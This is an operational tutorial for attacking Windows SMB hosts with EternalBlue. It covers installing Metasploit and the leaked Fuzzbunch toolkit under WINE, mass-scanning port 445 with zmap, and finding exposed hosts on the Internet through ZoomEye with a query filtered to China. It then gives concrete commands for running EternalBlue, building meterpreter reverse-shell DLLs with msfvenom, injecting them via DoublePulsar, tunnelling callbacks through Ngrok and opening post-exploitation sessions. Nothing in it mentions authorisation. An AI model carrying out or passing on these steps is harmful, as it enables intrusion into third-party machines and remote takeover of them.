Step‑by‑Step Guide to Setting Up MSF, Fuzzbunch, and Exploiting EternalBlue on Linux/macOS

Install Metasploit Framework (MSF)

Follow the official installation instructions for Linux or macOS. After installation, run msfconsole to verify that the console starts without errors.

Install WINE and winetricks

Linux

macOS

Install Windows Python environment

Run the Windows installer inside WINE and follow the wizard to completion.

Copy the toolset to the Windows partition

The default WINE virtual drive is ~/.wine/drive_c. Rename the windows folder inside the toolset (e.g., to tools) and copy it to ~/.wine/drive_c/tools.

Enter Win CMD

Launch the WINE command prompt. If you encounter a "wrong font" error, install the fonts-wine package or run winetricks --gui and enable corefonts. Adjust the console font via Properties → Font and test the Python installation with python --version.

Modify fuzzbunch default configuration

Edit ~/.wine/drive_c/tools/fuzzbunch.xml and change ResourcesDir to C:\tools\Resources and LogDir to C:\logs.

Run fuzzbunch

From the WINE CMD, change to the Python directory and execute the provided command (image shown). If the output matches the screenshot, the environment is ready.

Check network settings

Run the following command on the host to obtain the IP address and subnet mask: ifconfig # or ip addr show Record the values for later use.

Install Zmap (fast network scanner)

Linux

macOS

Verify the installation with sudo zmap --version.

Scan your subnet

Convert the subnet mask to CIDR notation (e.g., 255.255.192.0 → /18) and run: sudo zmap -B 10M -p 445 -o 445.csv -i eth0 10.128.129.45/18 Adjust the -B bandwidth option to suit your internal network. If you encounter a blacklist error, edit /etc/zmap/blacklist.conf to comment out internal addresses. Use -i <interface> to select the correct NIC and -G <gateway MAC> if required.

Alternative: Zoomeye

If the subnet scan returns no results, you can search the Internet using Zoomeye (https://www.zoomeye.org/) with the query service:microsoft-ds os:windows country:china (optionally add city:beijing) and manually populate 445.csv with the discovered IPs.

Vulnerability scanning with Metasploit

Start msfconsole and load the SMB version scanner: use auxiliary/scanner/smb/smb_version Set the target list with set RHOSTS 10.158.24.2 (or your own list) and adjust THREADS as needed, then run exploit. View discovered hosts with hosts. For deeper checks, use auxiliary/scanner/smb/smb_ms17_010.

Run fuzzbunch

Launch the WINE CMD, start Python, and run fuzzbunch. Provide the target IP, set Callback IP to 127.0.0.1, answer no to the third prompt, and accept defaults for the rest. The prompt fb > indicates successful configuration.

EternalBlue attack

Within fuzzbunch, load the EternalBlue module: use Eternalblue Enter the target IP, accept defaults, and choose attack method 1 (FB). Proceed through the interactive prompts; if you see "Triggering free of corrupted buffer" the exploit has likely succeeded.

TCP tunnel (optional)

If you lack a public IP, set up a TCP tunnel (e.g., via Ngrok) and replace LHOST with the tunnel address. For internal networks without restrictions, you can use your own NIC IP directly.

MSF listener for reverse shell

In Metasploit, use use multi/handler. Choose the appropriate payload:

32‑bit: set payload windows/meterpreter/reverse_tcp 64‑bit: set payload windows/x64/meterpreter/reverse_tcp Set LHOST 127.0.0.1 (when using a tunnel) and run the handler with exploit -j. View background jobs with jobs -l.

Generate shellcode DLLs

Run the following command inside MSF (replace placeholders):

msfvenom -p {Payload} -f dll -a {ARCH} LHOST={HOST} LPORT={PORT} -o /tmp/payload.dll

Generate both 32‑bit and 64‑bit DLLs and copy them to ~/.wine/drive_c.

Inject Doublepulsar

From the WINE CMD, launch fuzzbunch and select the Doublepulsar module. Choose Proto: SMB, select the correct architecture, then pick option 2 (RunDLL). Provide the path to the generated DLL (e.g., C:\x86.dll or C:\x64.dll) and confirm. A "Success" message indicates successful injection.

Post‑exploitation

Return to MSF and verify that a meterpreter session appears. List sessions with sessions -l and interact with a session using sessions -i <ID>. For basic post‑exploitation commands, refer to the Metasploit Meterpreter documentation.

Conclusion

The steps above cover environment setup, network discovery, vulnerability scanning, exploitation with EternalBlue, and establishing a persistent meterpreter session. Further enumeration and lateral movement are left as an exercise for the reader.